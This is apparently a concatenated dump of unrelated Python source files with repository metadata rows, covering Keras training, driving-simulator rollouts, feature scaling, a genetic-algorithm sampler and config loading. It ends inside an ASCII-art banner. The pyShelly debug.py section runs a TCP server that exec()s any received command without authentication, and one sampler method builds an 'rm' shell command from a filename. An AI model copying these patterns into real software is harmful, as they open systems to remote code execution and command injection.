model.add(MaxPooling2D(pool_size =(2, 2)))
model.add(Flatten())
model.add(Dense(64))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
train_datagen = ImageDataGenerator(
rescale=1. / 255,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
test_datagen = ImageDataGenerator(rescale=1. / 255)
train_generator = train_datagen.flow_from_directory(train_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size, class_mode='binary')
validation_generator = test_datagen.flow_from_directory(
validation_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size, class_mode ='binary')
model.fit_generator(train_generator,
steps_per_epoch=nb_train_samples // batch_size,
epochs=epochs, validation_data=validation_generator,
validation_steps=nb_validation_samples // batch_size)
model.save_weights('model_saved.h5')
| 27.542857
| 67
| 0.761411
| 277
| 1,928
| 5.039711
| 0.3213
| 0.08596
| 0.039398
| 0.060888
| 0.323782
| 0.272206
| 0.23639
| 0.23639
| 0.23639
| 0.23639
| 0
| 0.036173
| 0.110996
| 1,928
| 69
| 68
| 27.942029
| 0.778296
| 0.009855
| 0
| 0.207547
| 0
| 0
| 0.062926
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.09434
| 0
| 0.09434
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afbe04768d0e6a472f75c12cbd235fcaf4b5e777
| 2,113
|
py
|
Python
|
intersimple-expert-rollout-setobs2.py
|
sisl/InteractionImitation
|
9c9ee8f21b53e71bbca86b0b79c6e6d913a20567
|
[
"MIT"
] | 2
|
2022-03-13T19:43:08.000Z
|
2022-03-14T03:19:33.000Z
|
intersimple-expert-rollout-setobs2.py
|
sisl/InteractionImitation
|
9c9ee8f21b53e71bbca86b0b79c6e6d913a20567
|
[
"MIT"
] | null | null | null |
intersimple-expert-rollout-setobs2.py
|
sisl/InteractionImitation
|
9c9ee8f21b53e71bbca86b0b79c6e6d913a20567
|
[
"MIT"
] | null | null | null |
import torch
import functools
from src.core.sampling import rollout_sb3
from intersim.envs import IntersimpleLidarFlatIncrementingAgent
from intersim.envs.intersimple import speed_reward
from intersim.expert import NormalizedIntersimpleExpert
from src.util.wrappers import CollisionPenaltyWrapper, Setobs
import numpy as np
from gym.wrappers import TransformObservation
obs_min = np.array([
[-1000, -1000, 0, -np.pi, -1e-1, 0.],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
]).reshape(-1)
obs_max = np.array([
[1000, 1000, 20, np.pi, 1e-1, 0.],
[50, np.pi, 20, 20, np.pi, 1e-1],
[50, np.pi, 20, 20, np.pi, 1e-1],
[50, np.pi, 20, 20, np.pi, 1e-1],
[50, np.pi, 20, 20, np.pi, 1e-1],
[50, np.pi, 20, 20, np.pi, 1e-1],
]).reshape(-1)
def main(track:int, loc:int=0):
env = IntersimpleLidarFlatIncrementingAgent(
loc=loc,
track=track,
n_rays=5,
reward=functools.partial(
speed_reward,
collision_penalty=0
),
)
policy = NormalizedIntersimpleExpert(env, mu=0.001)
env = Setobs(TransformObservation(
CollisionPenaltyWrapper(
env,
collision_distance=6, collision_penalty=100
), lambda obs: (obs - obs_min) / (obs_max - obs_min + 1e-10)
))
print(env.nv, 'vehicles')
expert_data = rollout_sb3(env, policy, n_episodes=150, max_steps_per_episode=200)
states, actions, rewards, dones = expert_data
print(f'Expert mean episode length {(~dones).sum() / states.shape[0]}')
print(f'Expert mean reward per episode {rewards[~dones].sum() / states.shape[0]}')
print(f'Observation mean', states[~dones].mean(0))
print(f'Observation std', states[~dones].std(0))
torch.save(expert_data, f'intersimple-expert-data-setobs2-loc{loc}-track{track}.pt')
def loop(tracks:list=[0]):
for track in tracks:
main(track)
if __name__=='__main__':
import fire
fire.Fire(loop)
| 32.507692
| 88
| 0.630857
| 311
| 2,113
| 4.196141
| 0.289389
| 0.067433
| 0.055172
| 0.064368
| 0.192337
| 0.186207
| 0.178544
| 0.138697
| 0.138697
| 0.138697
| 0
| 0.077335
| 0.204449
| 2,113
| 65
| 89
| 32.507692
| 0.698989
| 0
| 0
| 0.214286
| 0
| 0
| 0.111637
| 0.036897
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.178571
| 0
| 0.214286
| 0.089286
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afbe9673b618fa0388c83b7abcd87db09f9c7dda
| 2,840
|
py
|
Python
|
FeatureTransformation/UserInputFeatureScalling.py
|
Himanshu14k/AdultIncomePrediction_Project
|
522f170111c5e6e45ef1e26ef21f86f4ea3a8dcc
|
[
"MIT"
] | 2
|
2021-09-06T08:31:46.000Z
|
2021-10-30T12:53:21.000Z
|
FeatureTransformation/UserInputFeatureScalling.py
|
Himanshu14k/AdultIncomePrediction_Project
|
522f170111c5e6e45ef1e26ef21f86f4ea3a8dcc
|
[
"MIT"
] | 1
|
2021-09-07T13:53:26.000Z
|
2021-09-07T13:53:26.000Z
|
FeatureTransformation/UserInputFeatureScalling.py
|
Himanshu14k/AdultIncomePrediction_Project
|
522f170111c5e6e45ef1e26ef21f86f4ea3a8dcc
|
[
"MIT"
] | 2
|
2021-09-13T17:20:56.000Z
|
2021-11-21T16:05:16.000Z
|
from joblib import load
from pandas import DataFrame
import pickle
class FeatureScaling:
def __init__(self, user_input, logger_obj, file_obj):
try:
self.logger_obj = logger_obj
self.file_obj = file_obj
self.logger_obj.log("INFO", 'Different user input value assign process started')
self.user_input = user_input
self.Education = self.user_input['Education']
self.logger_obj.log("INFO", 'stated done')
self.Workclass = self.user_input['Workclass']
self.Age = self.user_input['Age']
self.Martial_Status = self.user_input['Martial_Status']
self.Occupation = self.user_input['Occupation']
self.Relationship = self.user_input['Relationship']
self.Race = self.user_input['Race']
self.Sex = self.user_input['Sex']
self.Final_Weight = self.user_input['Final_Weight']
self.Capital_Gain = self.user_input['Capital_Gain']
self.Capital_Loss = self.user_input['Capital_Loss']
self.Hours_Per_Week = self.user_input['Hours_Per_Week']
self.Country = self.user_input['Country']
self.X = [[self.Sex, self.Age, self.Final_Weight,
self.Education, self.Capital_Gain, self.Capital_Loss,
self.Hours_Per_Week, self.Workclass, self.Martial_Status, self.Occupation,
self.Relationship, self.Race, self.Country]]
self.logger_obj.log("INFO", 'Different user input value assign process Finished')
except Exception as e:
self.logger_obj.log('INFO',"Exception Occurred during variable creation of user input to store scale data in dictionary format! Exception Message: " + str(e))
self.logger_obj.log('INFO',"Process to create variable and store user input in that variable failed.")
def Scaling(self):
"""
:DESC: This Function takes data provided by user and performs Feature Scaling.
It uses two files scale.pickle File
:return: Sends Data to perform model testing.
"""
try:
self.logger_obj.log("INFO", 'Feature Scaling process started')
self.X = DataFrame(self.X)
sc = pickle.load(open("FeatureTransformation/scale.pickle", "rb"))
self.X.iloc[:, 1:] = sc.transform(self.X.iloc[:, 1:])
self.logger_obj.log("INFO", 'Feature scaling process successfully executed!')
return self.X
except Exception as e:
self.logger_obj.log('INFO',"Exception Occurred during Process of Feature Scaling! Exception Message: " + str(e))
self.logger_obj.log('INFO',"Process of Feature scaling Failed. Exited from Scaling function of FeatureScalling class")
| 53.584906
| 171
| 0.633099
| 349
| 2,840
| 5
| 0.280802
| 0.103152
| 0.111748
| 0.082521
| 0.343266
| 0.296275
| 0.270487
| 0.234957
| 0.187966
| 0.187966
| 0
| 0.00096
| 0.266197
| 2,840
| 53
| 172
| 53.584906
| 0.836372
| 0.058803
| 0
| 0.093023
| 0
| 0
| 0.280367
| 0.012987
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046512
| false
| 0
| 0.069767
| 0
| 0.162791
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afbeec327d96ab2c12353a666a3a203a3a3bf18e
| 4,073
|
py
|
Python
|
pyShelly/debug.py
|
rfvermut/pyShelly
|
c2f27ef14d1eaf94c403858a898a919d0005d639
|
[
"MIT"
] | 39
|
2019-03-19T11:09:26.000Z
|
2022-03-19T12:44:47.000Z
|
pyShelly/debug.py
|
rfvermut/pyShelly
|
c2f27ef14d1eaf94c403858a898a919d0005d639
|
[
"MIT"
] | 34
|
2019-05-21T18:41:18.000Z
|
2022-03-27T07:30:49.000Z
|
pyShelly/debug.py
|
rfvermut/pyShelly
|
c2f27ef14d1eaf94c403858a898a919d0005d639
|
[
"MIT"
] | 42
|
2019-03-28T15:18:59.000Z
|
2021-12-27T19:16:44.000Z
|
import socket
import threading
import json
import sys
from io import StringIO
from .loop import Loop
from .const import (
LOGGER
)
class Debug_connection(Loop):
def __init__(self, parent, connection, client_address):
super(Debug_connection, self).__init__("Debug connection", parent._root)
self._debug_server = parent
self._connection = connection
self._client_address = client_address
self.state = 0
self.cmd = ''
self._locals = {'root':self._debug_server._root}
self._globals = {}
self.start_loop()
def loop_stopped(self):
try:
self._connection.close()
except:
pass
try:
self._mqt_debug_servert_server._connections.remove(self)
except:
pass
def loop(self):
if self.state == 0:
self._connection.send(b"> ")
self.state = 1
if self.state == 1:
try:
char = self._connection.recv(1).decode()
except socket.timeout:
pass
except:
LOGGER.exception("Error receiving debug command")
self.stop_loop()
if char in ['\r', '\n']:
if not self.cmd:
return
elif self.cmd == 'exit':
self.stop_loop()
else:
old_stdout = sys.stdout
redirected_output = sys.stdout = StringIO()
try:
exec(self.cmd, self._globals, self._locals)
res = redirected_output.getvalue()
self._connection.send(res.encode() + b"\r\n")
except Exception as ex:
self._connection.send(str(ex).encode() + b"\r\n")
finally:
sys.stdout = old_stdout
self.cmd = ''
self.state = 0
else:
self.cmd += char
class Debug_server(Loop):
def __init__(self, root):
super(Debug_server, self).__init__("Debug server", root)
self._root = root
self._socket = None
self._connections = []
self.start_loop()
def loop_started(self):
self._init_socket()
def _init_socket(self):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((self._root.bind_ip, 7212))
sock.listen(1)
self._socket = sock
def loop(self):
# Wait for a connection
connection, client_address = self._socket.accept()
conn = Debug_connection(self, connection, client_address)
self._connections.append(conn)
def loop_stopped(self):
if self._socket:
self._socket.close()
# import socket
# import sys
# def main():
# host = ""
# port = 50000
# backlog = 5
# size = 1024
# sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# sock.bind((host, port))
# sock.listen(backlog)
# while True:
# client, address = sock.accept()
# test.log("Client connected.")
# while True:
# data = client.recv(size).rstrip()
# if not data:
# continue
# test.log("Received command: %s" % data)
# if data == "disconnect":
# test.log("Client disconnected.")
# client.send(data)
# client.close()
# break
# if data == "exit":
# test.log("Client asked server to quit")
# client.send(data)
# client.close()
# return
# test.log("Executing command: %s" % data)
# try:
# exec(data)
# except Exception, err:
# test.log("Error occured while executing command: %s" % (
# data), str(err))
| 30.62406
| 94
| 0.499386
| 410
| 4,073
| 4.773171
| 0.282927
| 0.050077
| 0.035258
| 0.01533
| 0.099131
| 0.053143
| 0.053143
| 0.053143
| 0.053143
| 0.053143
| 0
| 0.008554
| 0.39725
| 4,073
| 133
| 95
| 30.62406
| 0.788595
| 0.273508
| 0
| 0.292683
| 0
| 0
| 0.027027
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0.036585
| 0.085366
| 0
| 0.219512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afc0461dd64d75f8650665858aa646a390a84868
| 972
|
py
|
Python
|
setup.py
|
AGOberprieler/allcopol
|
7fd3d8ad7c9ff8410155691d8a37fdbea7783c81
|
[
"MIT"
] | 1
|
2020-10-19T08:22:50.000Z
|
2020-10-19T08:22:50.000Z
|
setup.py
|
AGOberprieler/allcopol
|
7fd3d8ad7c9ff8410155691d8a37fdbea7783c81
|
[
"MIT"
] | null | null | null |
setup.py
|
AGOberprieler/allcopol
|
7fd3d8ad7c9ff8410155691d8a37fdbea7783c81
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
with open("README.md", "r") as f:
long_description = f.read()
setup(name = "allcopol",
version = "0.1.1",
description = "AllCoPol: Inferring allele co-ancestry in polyploids",
long_description = long_description,
long_description_content_type = "text/markdown",
url = "https://github.com/AGOberprieler/allcopol",
author = "Ulrich Lautenschlager",
author_email = "ulrich.lautenschlager@ur.de",
license = "MIT",
packages = find_packages(),
install_requires = [
"argparse", "biopython", "configargparse", "numpy", "scipy"
],
entry_points = {
"console_scripts": [
"allcopol=allcopol.allcopol:main",
"align_clusters=allcopol.align_clusters:main",
"create_indfile=allcopol.create_indfile:main",
"relabel_trees=allcopol.relabel_trees:main",
],
},
zip_safe = False,
python_requires = ">=3.5",
)
| 30.375
| 73
| 0.644033
| 102
| 972
| 5.941176
| 0.666667
| 0.09901
| 0.062706
| 0.09901
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006623
| 0.223251
| 972
| 31
| 74
| 31.354839
| 0.796026
| 0
| 0
| 0.074074
| 0
| 0
| 0.410917
| 0.190525
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.037037
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afc04d85e4ad399b752a6a1b506501312782c229
| 2,686
|
py
|
Python
|
genalg/sample.py
|
davidkant/thresholds-ga
|
78988bb1bfa1c1eb32afc24edf59e5fde2f1c212
|
[
"Apache-2.0"
] | null | null | null |
genalg/sample.py
|
davidkant/thresholds-ga
|
78988bb1bfa1c1eb32afc24edf59e5fde2f1c212
|
[
"Apache-2.0"
] | 9
|
2018-05-06T18:55:29.000Z
|
2018-05-06T19:13:33.000Z
|
genalg/sample.py
|
davidkant/thresholds-ga
|
78988bb1bfa1c1eb32afc24edf59e5fde2f1c212
|
[
"Apache-2.0"
] | null | null | null |
import spec
import sonicfeatures
import display
import random
import os
class Sample:
"""Keep track of samples and their stuff."""
def __init__(self, genotype, gen=0, index=0, parents=None, fitness_func=None):
self.genotype = genotype
self.phentype = None
self.fitness_func = fitness_func
self.gen = gen
self.index = index
self.parents = parents
self.mutant = False
self.score = None
self.rid = None
@classmethod
def random_sample(cls, index, randorams, spec, fitness_func=None):
"""A random Sample."""
# return cls([spec.map_spec(param, random.random()) for i in range(4) for param in randorams], index)
random_sample = cls([spec.map_spec(param, random.random()) for i in range(4) for param in randorams],
gen=0,
index=index,
parents=None,
fitness_func=fitness_func)
random_sample.phenotype = random_sample.to_phenotype(randorams, spec)
return random_sample
def to_phenotype(self, randorams, spec):
"""Map genotype [0,1] to through param spec."""
return [spec.map_spec(param, gene) for gene,param in zip(self.genotype, randorams)]
def render(self, renderer, filename='sample', verbose=True):
"""Ask rs server to render me."""
renderer.render(self, filename=filename, verbose=verbose)
return self
def render_and_do(self, renderer, do_func, func_args, filename='sample', verbose=True):
"""Render and do do_func upon completion."""
renderer.render_and_do(self, do_func, func_args, filename, verbose)
return self
def render_and_score(self, renderer, filename='sample', verbose=True):
"""Render and score fitness."""
renderer.render_and_score(self, filename, verbose)
return self
def fitness(self, renderer, deleteme=True):
"""Evalute fitness. Assume we are rendered."""
# print('{0}evaluating fitness: {1}'.format(NW_THRD, self.rid))
filename = '{0}/{1}.wav'.format(renderer.render_params['foldername'], self.filename)
fitness = self.fitness_func(filename)
print('{0}done evaluating fitness: {1}, index: {3} = {2}'.format(display.NOTIFY, self.rid, fitness, self.index))
# delete file for space
if deleteme: os.system('rm "{0}"'.format(filename))
# do this last cuz triggers stuff
self.score = fitness
return self
def __repr__(self):
return '<Sample(gen: {0.gen!r}, index: {0.index!r}, rid: {0.rid!r}, score: {0.score!r})>'.format(self)
| 40.089552
| 120
| 0.624348
| 342
| 2,686
| 4.78655
| 0.269006
| 0.047037
| 0.031765
| 0.029322
| 0.221747
| 0.182651
| 0.075748
| 0.075748
| 0.075748
| 0.075748
| 0
| 0.009995
| 0.255026
| 2,686
| 66
| 121
| 40.69697
| 0.808096
| 0.167163
| 0
| 0.088889
| 0
| 0.022222
| 0.080073
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.177778
| false
| 0
| 0.111111
| 0.022222
| 0.466667
| 0.022222
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afc24baeb3d33abb5be32b2647fa2afb09362e83
| 1,945
|
py
|
Python
|
youtube_rss_subscriber/config.py
|
miquelruiz/youtube-rss-subscriber
|
0dbdb011faf910be7dfd4757cd7295b898d4297c
|
[
"WTFPL"
] | 3
|
2021-03-21T07:43:12.000Z
|
2021-07-23T11:07:55.000Z
|
youtube_rss_subscriber/config.py
|
miquelruiz/youtube-rss-subscriber
|
0dbdb011faf910be7dfd4757cd7295b898d4297c
|
[
"WTFPL"
] | null | null | null |
youtube_rss_subscriber/config.py
|
miquelruiz/youtube-rss-subscriber
|
0dbdb011faf910be7dfd4757cd7295b898d4297c
|
[
"WTFPL"
] | 2
|
2021-04-11T13:26:29.000Z
|
2021-07-25T18:03:34.000Z
|
from typing import Any, Dict, List, Optional, cast
from pathlib import Path
import yaml
CONFIG_FILE_NAME = "config.yml"
CONFIG_DIRS = (
Path.home() / Path(".yrs"),
Path("/etc/youtube-rss-subscriber"),
)
class Config:
_instance: Optional["Config"] = None
_config: Dict[str, Any]
_required_keys: List[str] = ["database_url"]
def __new__(cls) -> "Config":
if cls._instance is None:
cls._instance = super(Config, cls).__new__(cls)
config_file_path = None
for c in CONFIG_DIRS:
file_path = c / Path(CONFIG_FILE_NAME)
if c.is_dir() and file_path.is_file():
config_file_path = file_path
if config_file_path is None:
config_file_path = init()
with open(config_file_path, "r") as cfile:
cls._config = cast(Dict[str, Any], yaml.safe_load(cfile))
for k in cls._required_keys:
try:
cls._config[k]
except KeyError:
raise RuntimeError(f"Invalid configuration: '{k}' missing")
return cls._instance
@property
def database_url(self) -> str:
return cast(str, self._config["database_url"])
@property
def youtube_dl_opts(self) -> Dict[str, Any]:
return cast(Dict[str, Any], self._config["youtube_dl_opts"])
def init() -> Path:
config_dir = CONFIG_DIRS[0]
config_dir.mkdir(exist_ok=True)
config_file_path = config_dir / Path(CONFIG_FILE_NAME)
with open(config_file_path, "w") as cfile:
yaml.dump(
{
"database_url": f"sqlite:///{config_dir}/yrs.db",
"youtube_dl_opts": {
"outtmpl": "%(title)s-%(id)s.%(ext)s",
},
},
stream=cfile,
)
print(f"Config file created in {config_file_path}")
return config_file_path
| 28.602941
| 79
| 0.568123
| 240
| 1,945
| 4.316667
| 0.3375
| 0.125483
| 0.121622
| 0.034749
| 0.042471
| 0
| 0
| 0
| 0
| 0
| 0
| 0.000752
| 0.316195
| 1,945
| 67
| 80
| 29.029851
| 0.778195
| 0
| 0
| 0.038462
| 0
| 0
| 0.132648
| 0.041131
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.057692
| 0.038462
| 0.288462
| 0.019231
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afcab14f17dffbf6475626aeb921c67d6e9af7bc
| 4,494
|
py
|
Python
|
Assets/ExpressiveRangeAnalyses/example_generator.py
|
rafaeldolfe/Mixed-initiative-Tile-based-Designer
|
9001f0e1b68ec8c9fa49d876d2cc6ec1426d1d01
|
[
"MIT"
] | null | null | null |
Assets/ExpressiveRangeAnalyses/example_generator.py
|
rafaeldolfe/Mixed-initiative-Tile-based-Designer
|
9001f0e1b68ec8c9fa49d876d2cc6ec1426d1d01
|
[
"MIT"
] | null | null | null |
Assets/ExpressiveRangeAnalyses/example_generator.py
|
rafaeldolfe/Mixed-initiative-Tile-based-Designer
|
9001f0e1b68ec8c9fa49d876d2cc6ec1426d1d01
|
[
"MIT"
] | null | null | null |
import sys
import numpy as np
import math
import matplotlib.pyplot as plt
from numpy.lib.polynomial import poly
import pandas as pd
from matplotlib import cm
import matplotlib.patheffects as path_effects
import random
class Run:
def __init__(self, run_name, linearities, leniencies, ids):
self.run_name = run_name
self.linearities = linearities
self.leniencies = leniencies
self.ids = ids
self.sample_size = len(linearities)
self.PerformCalculations()
def PerformCalculations(self):
self.min_leniency = min(self.leniencies)
self.max_leniency = max(self.leniencies)
self.normalized_leniencies = list(map(lambda x: self.normalize(x, self.min_leniency, self.max_leniency), self.leniencies))
self.min_linearity = min(self.linearities)
self.max_linearity = max(self.linearities)
self.normalized_linearities = list(map(lambda x: self.normalize(x, self.min_linearity, self.max_linearity), self.linearities))
self.average_linearity = sum(self.linearities)/len(self.linearities)
self.average_leniency = sum(self.leniencies)/len(self.leniencies)
self.average_point = (self.average_linearity, self.average_leniency)
self.normalized_average_point = (self.normalize(self.average_linearity, self.min_linearity, self.max_linearity), self.normalize(self.average_leniency, self.min_leniency, self.max_leniency))
self.std_linearity = np.std(self.linearities)
self.std_leniency = np.std(self.leniencies)
def normalize(self, x, min, max):
return (x - min) / (max - min)
def __str__(self):
return f'<name: {self.run_name}, sample_size: {len(self.ids)}, average linearity: {round(self.average_linearity, 2)}, average leniency: {round(self.average_leniency, 2)}>'
def __repr__(self):
return str(self)
def print_random_samples_of_maps(run, num):
random_sample = random.sample(run.ids, num)
for sample in random_sample:
print((sample, run.normalized_linearities[sample], run.normalized_leniencies[sample], run.linearities[sample], run.leniencies[sample]))
def find_same_normalized_data_point(id_list1, id_list2, normalized_linearity, normalized_leniency, linearity_weight):
firstLevel = min(id_list1, key=lambda entry:abs(entry[1]-normalized_linearity)*linearity_weight+abs(entry[2]-normalized_leniency))
secondLevel = min(id_list2, key=lambda entry:abs(entry[1]-normalized_linearity)*linearity_weight+abs(entry[2]-normalized_leniency))
return (firstLevel, secondLevel)
filename = f'example_generator_config.txt'
run_names = []
number_of_maps_to_randomly_sample = 0
with open(filename) as f:
name_of_everything = f.readline().rstrip('\n')
number_of_maps_to_randomly_sample = int(f.readline())
run_name = f.readline()
while run_name != "":
run_names.append(run_name.rstrip('\n'))
run_name = f.readline()
print(run_names)
number_of_runs = len(run_names)
runs = []
for i in range(len(run_names)):
run_name = run_names[i]
run_file_name = f'{run_name}/data.txt'
with open(run_file_name) as f:
display_name = f.readline()
ids = []
leniencies = []
linearities = []
id = f.readline()
while id != "":
ids.append(int(id))
leniency = f.readline().rstrip('\n').replace(',',".")
leniencies.append(float(leniency))
linearity = f.readline().rstrip('\n').replace(',',".")
linearities.append(float(linearity))
id = f.readline()
runs.append(Run(display_name, linearities, leniencies, ids))
normalized_id_lists = []
for run in runs:
normalized_id_lists.append(list(zip(run.ids, run.normalized_linearities, run.normalized_leniencies, run.linearities, run.leniencies)))
print_random_samples_of_maps(runs[0], number_of_maps_to_randomly_sample)
print("Enter normalized linearity")
normalized_linearity = float(input())
print("Enter normalized leniency")
normalized_leniency = float(input())
print("How weighted should linearity be?")
linearity_weight = float(input())
print("Which runs to get it from")
print("Run nmbr 1")
run_number_1 = int(input())
print("Run nmbr 2")
run_number_2 = int(input())
id_list1 = normalized_id_lists[run_number_1]
id_list2 = normalized_id_lists[run_number_2]
print(find_same_normalized_data_point(id_list1, id_list2, normalized_linearity, normalized_leniency, linearity_weight))
| 36.536585
| 198
| 0.715398
| 593
| 4,494
| 5.175379
| 0.187184
| 0.022809
| 0.030955
| 0.013685
| 0.254154
| 0.206582
| 0.179211
| 0.138156
| 0.138156
| 0.115347
| 0
| 0.005887
| 0.168447
| 4,494
| 122
| 199
| 36.836066
| 0.81536
| 0
| 0
| 0.043478
| 0
| 0.01087
| 0.077694
| 0.019368
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076087
| false
| 0
| 0.097826
| 0.032609
| 0.228261
| 0.119565
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afcbed072ad157da39a96ed8b309d2b6f0eb45c5
| 781
|
py
|
Python
|
tests/test_utils.py
|
cdyfng/pyetheroll
|
84149f328a1dc6db47834d02ade50e21286f3409
|
[
"MIT"
] | 1
|
2018-11-01T02:58:35.000Z
|
2018-11-01T02:58:35.000Z
|
tests/test_utils.py
|
cdyfng/pyetheroll
|
84149f328a1dc6db47834d02ade50e21286f3409
|
[
"MIT"
] | 13
|
2019-03-13T13:21:42.000Z
|
2020-05-27T21:55:40.000Z
|
tests/test_utils.py
|
cdyfng/pyetheroll
|
84149f328a1dc6db47834d02ade50e21286f3409
|
[
"MIT"
] | 2
|
2019-08-01T07:01:31.000Z
|
2021-12-20T05:09:02.000Z
|
from datetime import datetime
from pyetheroll.utils import EtherollUtils, timestamp2datetime
class TestEtherollUtils:
def test_compute_profit(self):
bet_size = 0.10
chances_win = 34
payout = EtherollUtils.compute_profit(bet_size, chances_win)
assert payout == 0.19
bet_size = 0.10
# chances of winning must be less than 100%
chances_win = 100
payout = EtherollUtils.compute_profit(bet_size, chances_win)
assert payout is None
class TestUtils:
def test_timestamp2datetime(self):
assert timestamp2datetime("1566645978") == (
datetime(2019, 8, 24, 11, 26, 18)
)
assert timestamp2datetime("0x5d611eda") == (
datetime(2019, 8, 24, 11, 26, 18)
)
| 28.925926
| 68
| 0.644046
| 89
| 781
| 5.505618
| 0.47191
| 0.057143
| 0.032653
| 0.040816
| 0.404082
| 0.334694
| 0.334694
| 0.24898
| 0.24898
| 0.24898
| 0
| 0.109929
| 0.277849
| 781
| 26
| 69
| 30.038462
| 0.758865
| 0.052497
| 0
| 0.3
| 0
| 0
| 0.0271
| 0
| 0
| 0
| 0.01355
| 0
| 0.2
| 1
| 0.1
| false
| 0
| 0.1
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afceefa6ab42fdff336bb5e178d3b569a6751ee3
| 7,156
|
py
|
Python
|
adventxtend.py
|
Textovortex/AdventXtend
|
0818804daecb570c98b6d7793a99223d2f14665b
|
[
"MIT"
] | 1
|
2021-04-16T12:04:56.000Z
|
2021-04-16T12:04:56.000Z
|
adventxtend.py
|
leha-code/adventXtend
|
0818804daecb570c98b6d7793a99223d2f14665b
|
[
"MIT"
] | 2
|
2021-04-16T16:16:47.000Z
|
2021-04-18T01:19:06.000Z
|
adventxtend.py
|
leha-code/adventXtend
|
0818804daecb570c98b6d7793a99223d2f14665b
|
[
"MIT"
] | null | null | null |
'''
________ ________ ___ ___ _______ ________ _________ ___ ___ _________ _______ ________ ________
|\ __ \|\ ___ \|\ \ / /|\ ___ \ |\ ___ \|\___ ___\|\ \ / /|\___ ___\\ ___ \ |\ ___ \|\ ___ \
\ \ \|\ \ \ \_|\ \ \ \ / / | \ __/|\ \ \\ \ \|___ \ \_|\ \ \/ / ||___ \ \_\ \ __/|\ \ \\ \ \ \ \_|\ \
\ \ __ \ \ \ \\ \ \ \/ / / \ \ \_|/_\ \ \\ \ \ \ \ \ \ \ / / \ \ \ \ \ \_|/_\ \ \\ \ \ \ \ \\ \
\ \ \ \ \ \ \_\\ \ \ / / \ \ \_|\ \ \ \\ \ \ \ \ \ / \/ \ \ \ \ \ \_|\ \ \ \\ \ \ \ \_\\ \
\ \__\ \__\ \_______\ \__/ / \ \_______\ \__\\ \__\ \ \__\/ /\ \ \ \__\ \ \_______\ \__\\ \__\ \_______\
